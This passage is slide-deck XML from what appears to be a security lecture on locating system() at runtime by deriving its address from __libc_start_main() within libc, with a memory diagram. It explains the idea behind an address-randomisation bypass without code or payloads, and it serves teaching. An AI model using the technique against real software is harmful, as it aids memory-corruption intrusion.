              <a:t>, a function used to setup the program execution environment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can derive the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system()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> address from the address of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start_main()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start_main()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> and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system()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> are in the same library and therefore in the same continuous address space</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="972" name="Google Shape;972;g24e5311e72c_0_822"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3204150" y="3842006"/>
            <a:ext cx="1121410" cy="673100"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="673100" w="1121410">
                <a:moveTo>
                  <a:pt x="1053713" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="67257" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="41077" y="5285"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19699" y="19699"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5285" y="41078"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="67259"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="605326"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5285" y="631506"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19699" y="652884"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="41077" y="667298"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="67257" y="672584"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1053713" y="672584"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1079894" y="667298"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1101273" y="652884"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1115687" y="631506"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1120973" y="605326"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1120973" y="67259"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1115687" y="41078"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1101273" y="19699"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1079894" y="5285"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1053713" y="0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g24e5311e72c_0_822"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3275454" y="4020751"/>
            <a:ext cx="9786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start_main()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g24e5311e72c_0_822"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4437221" y="4039298"/>
            <a:ext cx="238125" cy="278129"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="278129" w="238125">
                <a:moveTo>
                  <a:pt x="118822" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="118822" y="55600"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="55600"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="222401"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="118822" y="222401"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="118822" y="278001"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="237646" y="139001"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="118822" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="B1C0D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g24e5311e72c_0_822"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4773513" y="3842006"/>
            <a:ext cx="1121410" cy="673100"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="673100" w="1121410">
                <a:moveTo>
                  <a:pt x="1053713" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="67257" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="41077" y="5285"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19699" y="19699"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5285" y="41078"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="67259"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="605326"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5285" y="631506"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19699" y="652884"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="41077" y="667298"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="67257" y="672584"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1053713" y="672584"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1079894" y="667298"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1101273" y="652884"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1115687" y="631506"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1120973" y="605326"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1120973" y="67259"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1115687" y="41078"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1101273" y="19699"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1079894" y="5285"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1053713" y="0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g24e5311e72c_0_822"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5069919" y="4020751"/>
            <a:ext cx="5283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main()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g24e5311e72c_0_822"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6006584" y="4039298"/>
            <a:ext cx="238125" cy="278129"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="278129" w="238125">
                <a:moveTo>
                  <a:pt x="118822" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="118822" y="55600"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="55600"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="222401"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="118822" y="222401"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="118822" y="278001"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="237644" y="139001"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="118822" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="B1C0D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g24e5311e72c_0_822"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6342876" y="3842006"/>
            <a:ext cx="1121410" cy="673100"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="673100" w="1121410">
                <a:moveTo>
                  <a:pt x="1053713" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="67257" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="41077" y="5285"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19699" y="19699"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5285" y="41078"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="67259"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="605326"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5285" y="631506"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19699" y="652884"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="41077" y="667298"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="67257" y="672584"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1053713" y="672584"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1079894" y="667298"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1101272" y="652884"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1115686" y="631506"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1120971" y="605326"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1120971" y="67259"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1115686" y="41078"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1101272" y="19699"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1079894" y="5285"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1053713" y="0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g24e5311e72c_0_822"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6479971" y="4053531"/>
            <a:ext cx="8472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myFunction()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24e5311e72c_0_836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Finding Dynamic system() Address</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="986" name="Google Shape;986;g24e5311e72c_0_836"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5200650" y="1701800"/>
            <a:ext cx="1581150" cy="4848858"/>
            <a:chOff x="4133850" y="1168400"/>
            <a:chExt cx="1581150" cy="4848858"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="987" name="Google Shape;987;g24e5311e72c_0_836"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4133850" y="1168400"/>
              <a:ext cx="1581150" cy="226059"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="226059" w="1581150">
                  <a:moveTo>
                    <a:pt x="1581150" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="226060"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1581150" y="226060"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1581150" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="CFD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g24e5311e72c_0_836"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4133850" y="1394459"/>
              <a:ext cx="1581150" cy="226059"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="226059" w="1581150">
                  <a:moveTo>
                    <a:pt x="1581150" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="226060"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1581150" y="226060"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1581150" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="E8EC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g24e5311e72c_0_836"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4133850" y="1620519"/>
              <a:ext cx="1581150" cy="226060"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="226060" w="1581150">
                  <a:moveTo>
                    <a:pt x="1581150" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="226059"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1581150" y="226059"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1581150" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="CFD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g24e5311e72c_0_836"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4133850" y="1846580"/>
              <a:ext cx="1581150" cy="3185160"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="3185160" w="1581150">
                  <a:moveTo>
                    <a:pt x="1581150" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="3185160"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1581150" y="3185160"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1581150" y="0"/>
                  </a:ln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g24e5311e72c_0_836"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4133850" y="5031740"/>
              <a:ext cx="1581150" cy="246379"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="246379" w="1581150">
                  <a:moveTo>
                    <a:pt x="1581150" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="246380"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1581150" y="246380"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1581150" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="E8EC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g24e5311e72c_0_836"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4133850" y="5278120"/>
              <a:ext cx="1581150" cy="246379"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="246379" w="1581150">
                  <a:moveTo>
                    <a:pt x="1581150" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="246379"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1581150" y="246379"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1581150" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="CFD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g24e5311e72c_0_836"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4133850" y="5524500"/>
              <a:ext cx="1581150" cy="246379"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="246379" w="1581150">
                  <a:moveTo>
                    <a:pt x="1581150" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="246379"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1581150" y="246379"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1581150" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="E8EC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g24e5311e72c_0_836"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4133850" y="5770879"/>
              <a:ext cx="1581150" cy="246379"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="246379" w="1581150">
                  <a:moveTo>
                    <a:pt x="1581150" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="246379"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1581150" y="246379"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1581150" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="CFD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5" name="Google Shape;995;g24e5311e72c_0_836"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5200650" y="1524000"/>
            <a:ext cx="1581300" cy="1692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Memory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6" name="Google Shape;996;g24e5311e72c_0_836"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4267773" y="1607779"/>
            <a:ext cx="8643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1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0xfffffffc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6416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7" name="Google Shape;997;g24e5311e72c_0_836"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5488223" y="3045419"/>
            <a:ext cx="10185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17375E"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>start_main()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444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17375E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8" name="Google Shape;998;g24e5311e72c_0_836"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5655890" y="4096979"/>
            <a:ext cx="6840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17375E"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>system()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9" name="Google Shape;999;g24e5311e72c_0_836"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4225856" y="5943558"/>
            <a:ext cx="8643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0x00000000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0" name="Google Shape;1000;g24e5311e72c_0_836"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5200650" y="1517650"/>
            <a:ext cx="1587500" cy="12700"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="12700" w="1587500">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1587500" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1587500" y="12700"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="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1" name="Google Shape;1001;g24e5311e72c_0_836"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4368800" y="1682749"/>
            <a:ext cx="2882899" cy="4874260"/>
            <a:chOff x="3302000" y="1149349"/>
            <a:chExt cx="2882899" cy="4874260"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1002" name="Google Shape;1002;g24e5311e72c_0_836"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4127500" y="1149349"/>
              <a:ext cx="1593850" cy="4874260"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="4874260" w="1593850">
                  <a:moveTo>
                    <a:pt x="1593850" y="4861560"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="6350" y="4861560"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6350" y="4874260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1593850" y="4874260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1593850" y="4861560"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path extrusionOk="0" h="4874260" w="1593850">
                  <a:moveTo>
                    <a:pt x="1593850" y="4615180"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="6350" y="4615180"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6350" y="4627880"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1593850" y="4627880"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1593850" y="4615180"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path extrusionOk="0" h="4874260" w="1593850">
                  <a:moveTo>
                    <a:pt x="1593850" y="4368800"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="6350" y="4368800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6350" y="4381500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1593850" y="4381500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1593850" y="4368800"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path extrusionOk="0" h="4874260" w="1593850">
                  <a:moveTo>
                    <a:pt x="1593850" y="4122420"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="6350" y="4122420"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6350" y="4135120"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1593850" y="4135120"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1593850" y="4122420"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path extrusionOk="0" h="4874260" w="1593850">
                  <a:moveTo>
                    <a:pt x="1593850" y="3876040"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="6350" y="3876040"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6350" y="3888740"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1593850" y="3888740"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1593850" y="3876040"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path extrusionOk="0" h="4874260" w="1593850">
                  <a:moveTo>
                    <a:pt x="1593850" y="690880"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="6350" y="690880"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6350" y="703580"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1593850" y="703580"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1593850" y="690880"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path extrusionOk="0" h="4874260" w="1593850">
                  <a:moveTo>
                    <a:pt x="1593850" y="464820"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="6350" y="464820"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6350" y="477520"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1593850" y="477520"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1593850" y="464820"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path extrusionOk="0" h="4874260" w="1593850">
                  <a:moveTo>
                    <a:pt x="1593850" y="238760"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="6350" y="238760"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6350" y="251460"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1593850" y="251460"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1593850" y="238760"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path extrusionOk="0" h="4874260" w="1593850">
                  <a:moveTo>
                    <a:pt x="159385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593850" y="38100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15938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03" name="Google Shape;1003;g24e5311e72c_0_8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753099" y="1874199"/>
              <a:ext cx="431800" cy="101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4" name="Google Shape;1004;g24e5311e72c_0_836"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5791200" y="1905000"/>
              <a:ext cx="342900" cy="914400"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="914400" w="342900">
                  <a:moveTo>
                    <a:pt x="0" y="914400"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="66736" y="912154"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="121233" y="906030"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="157976" y="896948"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="171450" y="885826"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="171450" y="485773"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="184923" y="474651"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="221666" y="465569"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="276163" y="459445"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="342900" y="457200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="276163" y="454954"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="221666" y="448830"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="184923" y="439748"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="171450" y="428626"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="171450" y="28573"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="157976" y="17451"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="121233" y="8369"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="66736" y="2245"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo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05" name="Google Shape;1005;g24e5311e72c_0_8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02000" y="1823688"/>
              <a:ext cx="812800" cy="32763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6" name="Google Shape;1006;g24e5311e72c_0_836"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3352800" y="1854488"/>
              <a:ext cx="723900" cy="3175000"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="3175000" w="723900">
                  <a:moveTo>
                    <a:pt x="723900" y="3174711"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="650954" y="3173486"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="583012" y="3169971"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="521530" y="3164409"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="467962" y="3157043"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="423765" y="3148116"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="369303" y="3126546"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="361950" y="3114389"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="361950" y="1647678"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="354596" y="1635521"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="300134" y="1613951"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="255937" y="1605024"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="202369" y="1597658"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="140887" y="1592096"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="72945" y="1588581"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1587356"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="72945" y="1586130"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="140887" y="1582615"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="202369" y="1577054"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="255937" y="1569688"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="300134" y="1560760"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="354596" y="1539190"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="361950" y="1527032"/>
                  </a:lnTo>
                  <a:lnTo>
